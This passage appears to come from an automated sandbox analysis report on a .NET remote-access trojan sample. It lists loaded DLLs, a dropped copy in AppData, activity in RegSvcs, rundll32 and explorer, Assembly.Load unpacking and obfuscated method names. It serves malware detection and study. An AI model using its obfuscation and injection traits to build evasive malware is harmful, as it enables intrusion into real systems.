Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: dKJy.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dKJy.pdb source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: KfYvtUBOq.exe.0.dr, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, PingPong.cs	.Net Code: Justy

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0730B09D push ebp; retf	0_2_0730B09E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0730D0E8 pushfd ; ret	0_2_0730D0E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD push ecx; mov dword ptr [esp], ecx	7_2_011309B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0110135E push eax; iretd	7_2_01101369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01101FEC push eax; iretd	7_2_01101FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01187E99 push ecx; ret	7_2_01187EAC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_0730D271 push ss; retf	8_2_0730D277
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_0730B09D push ebp; retf	8_2_0730B09E
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073B1C70 push eax; retf	8_2_073B1C71
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073B1C90 pushad ; retf	8_2_073B1C91
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073BAB00 push eax; mov dword ptr [esp], ecx	8_2_073BAB04
Source: C:\Windows\explorer.exe	Code function: 9_2_0E399B1E push esp; retn 0000h	9_2_0E399B1F
Source: C:\Windows\explorer.exe	Code function: 9_2_0E399B02 push esp; retn 0000h	9_2_0E399B03
Source: C:\Windows\explorer.exe	Code function: 9_2_0E3999B5 push esp; retn 0000h	9_2_0E399AE7
Source: C:\Windows\explorer.exe	Code function: 9_2_104FC9B5 push esp; retn 0000h	9_2_104FCAE7
Source: C:\Windows\explorer.exe	Code function: 9_2_104FCB02 push esp; retn 0000h	9_2_104FCB03
Source: C:\Windows\explorer.exe	Code function: 9_2_104FCB1E push esp; retn 0000h	9_2_104FCB1F
Source: C:\Windows\explorer.exe	Code function: 9_2_106409B5 push esp; retn 0000h	9_2_10640AE7
Source: C:\Windows\explorer.exe	Code function: 9_2_10640B02 push esp; retn 0000h	9_2_10640B03
Source: C:\Windows\explorer.exe	Code function: 9_2_10640B1E push esp; retn 0000h	9_2_10640B1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004172AA push ebx; ret	13_2_004172AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D4C5 push eax; ret	13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D57C push eax; ret	13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D512 push eax; ret	13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D51B push eax; ret	13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00416656 push ecx; retf	13_2_00416669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D7FE push dword ptr [397EB1CEh]; ret	13_2_0041DDB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0121225F pushad ; ret	13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012127FA pushad ; ret	13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012409AD push ecx; mov dword ptr [esp], ecx	13_2_012409B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0121283D push eax; iretd	13_2_01212858

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Static PE information: section name: .text entropy: 7.977493198205763
Source: KfYvtUBOq.exe.0.dr	Static PE information: section name: .text entropy: 7.977493198205763

Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
